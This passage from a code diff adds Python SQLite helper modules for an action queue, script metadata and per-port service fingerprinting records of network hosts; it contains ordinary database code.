WHEN 'failed' THEN 4
WHEN 'success' THEN 5
WHEN 'expired' THEN 6
WHEN 'cancelled' THEN 7
ELSE 99
END ASC,
priority_effective DESC,
COALESCE(scheduled_for, created_at) ASC
"""
select_sql = """
SELECT *,
MIN(100, priority + CAST((strftime('%s','now') - strftime('%s',created_at))/300 AS INTEGER)) AS priority_effective
FROM action_queue
"""
if statuses:
in_clause = ",".join("?" for _ in statuses)
return self.base.query(f"""
{select_sql}
WHERE status IN ({in_clause})
ORDER BY {order_sql}
""", tuple(statuses))
return self.base.query(f"""
{select_sql}
ORDER BY {order_sql}
""")
def get_upcoming_actions_summary(self) -> List[Dict[str, Any]]:
"""Summary: next run per action_name from the schedule"""
return self.base.query("""
SELECT action_name, MIN(scheduled_for) AS next_run_at
FROM action_queue
WHERE status='scheduled' AND scheduled_for IS NOT NULL
GROUP BY action_name
ORDER BY next_run_at ASC
""")
# =========================================================================
# QUEUE UPDATE OPERATIONS
# =========================================================================
def update_queue_status(self, queue_id: int, status: str, error_msg: str = None, result: str = None):
"""Update queue entry status with retry management on failure/expiry"""
self.base.invalidate_stats_cache()
if status == 'running':
self.base.execute(
"UPDATE action_queue SET status=?, started_at=CURRENT_TIMESTAMP WHERE id=?",
(status, queue_id)
)
elif status in ('failed', 'expired'):
self.base.execute("""
UPDATE action_queue
SET status=?,
completed_at=CURRENT_TIMESTAMP,
error_message=?,
result_summary=COALESCE(?, result_summary),
retry_count = MIN(retry_count + 1, max_retries)
WHERE id=?
""", (status, error_msg, result, queue_id))
elif status in ('success', 'cancelled'):
self.base.execute("""
UPDATE action_queue
SET status=?,
completed_at=CURRENT_TIMESTAMP,
error_message=?,
result_summary=COALESCE(?, result_summary)
WHERE id=?
""", (status, error_msg, result, queue_id))
# When execution succeeds, supersede old failed/expired attempts
if status == 'success':
row = self.base.query_one("""
SELECT action_name, mac_address, port,
COALESCE(completed_at, started_at, created_at) AS ts
FROM action_queue WHERE id=? LIMIT 1
""", (queue_id,))
if row:
try:
self.supersede_old_attempts(row['action_name'], row['mac_address'], row['port'], row['ts'])
except Exception:
pass
def promote_due_scheduled_to_pending(self) -> int:
"""Promote scheduled actions that are due (returns number of rows affected)"""
self.base.invalidate_stats_cache()
return self.base.execute("""
UPDATE action_queue
SET status='pending'
WHERE status='scheduled'
AND scheduled_for <= CURRENT_TIMESTAMP
""")
# =========================================================================
# QUEUE INSERTION OPERATIONS
# =========================================================================
def ensure_scheduled_occurrence(
self,
action_name: str,
next_run_at: str,
mac: Optional[str] = "",
ip: Optional[str] = "",
*,
port: Optional[int] = None,
hostname: Optional[str] = None,
service: Optional[str] = None,
priority: int = 40,
trigger: str = "scheduler",
tags: Optional[Iterable[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
max_retries: Optional[int] = None,
) -> bool:
"""
Ensure a single upcoming 'scheduled' row exists for the given action/target.
Returns True if inserted, False if already present (enforced by unique partial index).
"""
js_tags = json.dumps(list(tags)) if tags is not None and not isinstance(tags, str) else (tags if isinstance(tags, str) else None)
js_meta = json.dumps(metadata, ensure_ascii=False) if metadata else None
try:
self.base.execute("""
INSERT INTO action_queue(
action_name, mac_address, ip, port, hostname, service,
priority, status, scheduled_for, trigger_source, tags, metadata, max_retries
) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)
""", (
action_name, mac or "", ip or "", port, hostname, service,
int(priority), "scheduled", next_run_at, trigger, js_tags, js_meta, max_retries
))
self.base.invalidate_stats_cache()
return True
except sqlite3.IntegrityError:
return False
def queue_action(self, action_name: str, mac: str, ip: str, port: int = None,
priority: int = 50, trigger: str = None, metadata: Dict = None) -> None:
"""Quick enqueue of a 'pending' action"""
meta_json = json.dumps(metadata, ensure_ascii=False) if metadata else None
self.base.execute("""
INSERT INTO action_queue
(action_name, mac_address, ip, port, priority, trigger_source, metadata)
VALUES (?,?,?,?,?,?,?)
""", (action_name, mac, ip, port, priority, trigger, meta_json))
def queue_action_at(
self,
action_name: str,
mac: Optional[str] = "",
ip: Optional[str] = "",
*,
port: Optional[int] = None,
hostname: Optional[str] = None,
service: Optional[str] = None,
priority: int = 50,
status: str = "pending",
scheduled_for: Optional[str] = None,
trigger: Optional[str] = "scheduler",
tags: Optional[Iterable[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
max_retries: Optional[int] = None,
) -> None:
"""Generic enqueue that can publish 'pending' or 'scheduled' items with a date"""
js_tags = json.dumps(list(tags)) if tags is not None and not isinstance(tags, str) else (tags if isinstance(tags, str) else None)
js_meta = json.dumps(metadata, ensure_ascii=False) if metadata else None
self.base.execute("""
INSERT INTO action_queue(
action_name, mac_address, ip, port, hostname, service,
priority, status, scheduled_for, trigger_source, tags, metadata, max_retries
) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)
""", (
action_name, mac or "", ip or "", port, hostname, service,
int(priority), status, scheduled_for, trigger, js_tags, js_meta, max_retries
))
# =========================================================================
# HISTORY AND STATUS OPERATIONS
# =========================================================================
def supersede_old_attempts(self, action_name: str, mac_address: str,
port: Optional[int] = None, ref_ts: Optional[str] = None) -> int:
"""
Mark as 'superseded' all old attempts (failed|expired) for the triplet (action, mac, port)
earlier than or equal to ref_ts (if provided). Returns affected row count.
"""
params: List[Any] = [action_name, mac_address, port]
time_clause = ""
if ref_ts:
time_clause = " AND datetime(COALESCE(completed_at, started_at, created_at)) <= datetime(?)"
params.append(ref_ts)
return self.base.execute(f"""
UPDATE action_queue
SET status='superseded',
error_message = COALESCE(error_message, 'superseded by newer success'),
completed_at = COALESCE(completed_at, CURRENT_TIMESTAMP)
WHERE action_name = ?
AND mac_address = ?
AND COALESCE(port,0) = COALESCE(?,0)
AND status IN ('failed','expired')
{time_clause}
""", tuple(params))
def list_attempt_history(self, action_name: str, mac_address: str,
port: Optional[int] = None, limit: int = 20) -> List[Dict[str, Any]]:
"""
Return history of attempts for (action, mac, port), most recent first.
"""
return self.base.query("""
SELECT action_name, mac_address, port, status, retry_count, max_retries,
COALESCE(completed_at, started_at, scheduled_for, created_at) AS ts
FROM action_queue
WHERE action_name=? AND mac_address=? AND COALESCE(port,0)=COALESCE(?,0)
ORDER BY datetime(ts) DESC
LIMIT ?
""", (action_name, mac_address, port, int(limit)))
def get_action_status_from_queue(
self,
action_name: str,
mac_address: Optional[str] = None
) -> Optional[Dict[str, Any]]:
"""
Return the latest status row for an action (optionally filtered by MAC).
"""
if mac_address:
rows = self.base.query("""
SELECT status, created_at, started_at, completed_at,
error_message, result_summary, retry_count, max_retries,
mac_address, port, hostname, service, priority
FROM action_queue
WHERE mac_address=? AND action_name=?
ORDER BY datetime(COALESCE(completed_at, started_at, scheduled_for, created_at)) DESC
LIMIT 1
""", (mac_address, action_name))
else:
rows = self.base.query("""
SELECT status, created_at, started_at, completed_at,
error_message, result_summary, retry_count, max_retries,
mac_address, port, hostname, service, priority
FROM action_queue
WHERE action_name=?
ORDER BY datetime(COALESCE(completed_at, started_at, scheduled_for, created_at)) DESC
LIMIT 1
""", (action_name,))
return rows[0] if rows else None
def get_last_action_status_from_queue(self, mac_address: str, action_name: str) -> Optional[Dict[str, str]]:
"""
Return {'status': 'success|failed|running|pending', 'raw': 'status_YYYYMMDD_HHMMSS'}
based only on action_queue.
"""
rows = self.base.query(
"""
SELECT status,
COALESCE(completed_at, started_at, scheduled_for, created_at) AS ts
FROM action_queue
WHERE mac_address=? AND action_name=?
ORDER BY datetime(COALESCE(completed_at, started_at, scheduled_for, created_at)) DESC
LIMIT 1
""",
(mac_address, action_name)
)
if not rows:
return None
status = rows[0]["status"]
ts = self._format_ts_for_raw(rows[0]["ts"])
return {"status": status, "raw": f"{status}_{ts}"}
def get_last_action_statuses_for_mac(self, mac_address: str) -> Dict[str, Dict[str, str]]:
"""
Map action_name -> {'status':..., 'raw':...} from the latest queue rows for a MAC.
"""
rows = self.base.query(
"""
SELECT action_name, status,
COALESCE(completed_at, started_at, scheduled_for, created_at) AS ts
FROM (
SELECT action_name, status, completed_at, started_at, scheduled_for, created_at,
ROW_NUMBER() OVER (
PARTITION BY action_name
ORDER BY datetime(COALESCE(completed_at, started_at, scheduled_for, created_at)) DESC
) AS rn
FROM action_queue
WHERE mac_address=?
)
WHERE rn=1
""",
(mac_address,)
)
out: Dict[str, Dict[str, str]] = {}
for r in rows:
ts = self._format_ts_for_raw(r["ts"])
st = r["status"]
out[r["action_name"]] = {"status": st, "raw": f"{st}_{ts}"}
return out
# =========================================================================
# HELPER METHODS
# =========================================================================
def _format_ts_for_raw(self, ts_db: Optional[str]) -> str:
"""
Convert SQLite 'YYYY-MM-DD HH:MM:SS' to 'YYYYMMDD_HHMMSS'.
Fallback to current UTC when no timestamp is available.
"""
from datetime import datetime as _dt
ts = (ts_db or "").strip()
if not ts:
return _dt.utcnow().strftime("%Y%m%d_%H%M%S")
return ts.replace("-", "").replace(":", "").replace(" ", "_")

62
db_utils/scripts.py Normal file
View File

@@ -0,0 +1,62 @@
# db_utils/scripts.py
# Script and project metadata operations
from typing import Any, Dict, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.scripts", level=logging.DEBUG)
class ScriptOps:
"""Script and project metadata management operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create scripts metadata table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS scripts (
name TEXT PRIMARY KEY,
type TEXT NOT NULL,
path TEXT NOT NULL,
main_file TEXT,
category TEXT,
description TEXT,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
logger.debug("Scripts table created/verified")
# =========================================================================
# SCRIPT OPERATIONS
# =========================================================================
def add_script(self, name: str, type_: str, path: str,
main_file: Optional[str] = None, category: Optional[str] = None,
description: Optional[str] = None):
"""Insert or update a script/project metadata row"""
self.base.execute("""
INSERT INTO scripts(name,type,path,main_file,category,description)
VALUES(?,?,?,?,?,?)
ON CONFLICT(name) DO UPDATE SET
type=excluded.type,
path=excluded.path,
main_file=excluded.main_file,
category=excluded.category,
description=excluded.description;
""", (name, type_, path, main_file, category, description))
def list_scripts(self) -> List[Dict[str, Any]]:
"""List all scripts/projects"""
return self.base.query("""
SELECT name, type, path, main_file, category, description, created_at
FROM scripts
ORDER BY name;
""")
def delete_script(self, name: str) -> None:
"""Delete a script/project metadata row by name"""
self.base.execute("DELETE FROM scripts WHERE name=?;", (name,))

191
db_utils/services.py Normal file
View File

@@ -0,0 +1,191 @@
# db_utils/services.py
# Per-port service fingerprinting and tracking operations
from typing import Dict, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.services", level=logging.DEBUG)
class ServiceOps:
"""Per-port service fingerprinting and tracking operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create port services tables"""
# PORT SERVICES (current view of per-port fingerprinting)
self.base.execute("""
CREATE TABLE IF NOT EXISTS port_services (
id INTEGER PRIMARY KEY AUTOINCREMENT,
mac_address TEXT NOT NULL,
ip TEXT,
port INTEGER NOT NULL,
protocol TEXT DEFAULT 'tcp',
state TEXT DEFAULT 'open',
service TEXT,
product TEXT,
version TEXT,
banner TEXT,
fingerprint TEXT,
confidence REAL,
source TEXT DEFAULT 'ml',
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
is_current INTEGER DEFAULT 1,
UNIQUE(mac_address, port, protocol)
);
""")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_ps_mac_port ON port_services(mac_address, port);")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_ps_state ON port_services(state);")
# Per-port service history (immutable log of changes)
self.base.execute("""
CREATE TABLE IF NOT EXISTS port_service_history (
id INTEGER PRIMARY KEY AUTOINCREMENT,
mac_address TEXT NOT NULL,
ip TEXT,
port INTEGER NOT NULL,
protocol TEXT DEFAULT 'tcp',
state TEXT,
service TEXT,
product TEXT,
version TEXT,
banner TEXT,
fingerprint TEXT,
confidence REAL,
source TEXT,
seen_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
logger.debug("Port services tables created/verified")
# =========================================================================
# SERVICE CRUD OPERATIONS
# =========================================================================
def upsert_port_service(
self,
mac_address: str,
ip: Optional[str],
port: int,
*,
protocol: str = "tcp",
state: str = "open",
service: Optional[str] = None,
product: Optional[str] = None,
version: Optional[str] = None,
banner: Optional[str] = None,
fingerprint: Optional[str] = None,
confidence: Optional[float] = None,
source: str = "ml",
touch_history_on_change: bool = True,
):
"""
Create/update the current (service,fingerprint,...) for a given (mac,port,proto).
Also refresh hosts.ports aggregate so legacy code keeps working.
"""
self.base.invalidate_stats_cache()
with self.base.transaction(immediate=True):
prev = self.base.query(
"""SELECT * FROM port_services
WHERE mac_address=? AND port=? AND protocol=? LIMIT 1""",
(mac_address, int(port), protocol)
)
if prev:
p = prev[0]
changed = any([
state != p.get("state"),
service != p.get("service"),
product != p.get("product"),
version != p.get("version"),
banner != p.get("banner"),
fingerprint != p.get("fingerprint"),
(confidence is not None and confidence != p.get("confidence")),
])
if touch_history_on_change and changed:
self.base.execute("""
INSERT INTO port_service_history
(mac_address, ip, port, protocol, state, service, product, version, banner, fingerprint, confidence, source)
VALUES (?,?,?,?,?,?,?,?,?,?,?,?)
""", (mac_address, ip, int(port), protocol, state, service, product, version, banner, fingerprint, confidence, source))
self.base.execute("""
UPDATE port_services
SET ip=?, state=?, service=?, product=?, version=?,
banner=?, fingerprint=?, confidence=?, source=?,
last_seen=CURRENT_TIMESTAMP
WHERE mac_address=? AND port=? AND protocol=?
""", (ip, state, service, product, version, banner, fingerprint, confidence, source,
mac_address, int(port), protocol))
else:
self.base.execute("""
INSERT INTO port_services
(mac_address, ip, port, protocol, state, service, product, version, banner, fingerprint, confidence, source)
VALUES (?,?,?,?,?,?,?,?,?,?,?,?)
""", (mac_address, ip, int(port), protocol, state, service, product, version, banner, fingerprint, confidence, source))
# Rebuild host ports for compatibility
self._rebuild_host_ports(mac_address)
def _rebuild_host_ports(self, mac_address: str):
"""Rebuild hosts.ports from current port_services where state='open' (tcp only)"""
row = self.base.query("SELECT ports, previous_ports FROM hosts WHERE mac_address=? LIMIT 1;", (mac_address,))
old_ports = set(int(p) for p in (row[0]["ports"].split(";") if row and row[0].get("ports") else []) if str(p).isdigit())
old_prev = set(int(p) for p in (row[0]["previous_ports"].split(";") if row and row[0].get("previous_ports") else []) if str(p).isdigit())
current_rows = self.base.query(
"SELECT port FROM port_services WHERE mac_address=? AND state='open' AND protocol='tcp'",
(mac_address,)
)
new_ports = set(int(r["port"]) for r in current_rows)
removed = old_ports - new_ports
new_prev = old_prev | removed
ports_txt = ";".join(str(p) for p in sorted(new_ports))
prev_txt = ";".join(str(p) for p in sorted(new_prev))
self.base.execute("""
INSERT INTO hosts(mac_address, ports, previous_ports, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
ports = excluded.ports,
previous_ports = excluded.previous_ports,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, ports_txt, prev_txt))
# =========================================================================
# SERVICE QUERY OPERATIONS
# =========================================================================
def get_services_for_host(self, mac_address: str) -> List[Dict]:
"""Return all per-port service rows for the given host, ordered by port"""
return self.base.query("""
SELECT port, protocol, state, service, product, version, confidence, last_seen
FROM port_services
WHERE mac_address=?
ORDER BY port
""", (mac_address,))
def find_hosts_by_service(self, service: str) -> List[Dict]:
"""Return distinct host MACs that expose the given service (state='open')"""
return self.base.query("""
SELECT DISTINCT mac_address FROM port_services
WHERE service=? AND state='open'
""", (service,))
def get_service_for_host_port(self, mac_address: str, port: int, protocol: str = "tcp") -> Optional[Dict]:
"""Return the single port_services row for (mac, port, protocol), if any"""
rows = self.base.query("""
SELECT * FROM port_services
WHERE mac_address=? AND port=? AND protocol=? LIMIT 1
""", (mac_address, int(port), protocol))
return rows[0] if rows else None

Some files were not shown because too many files have changed in this diff Show More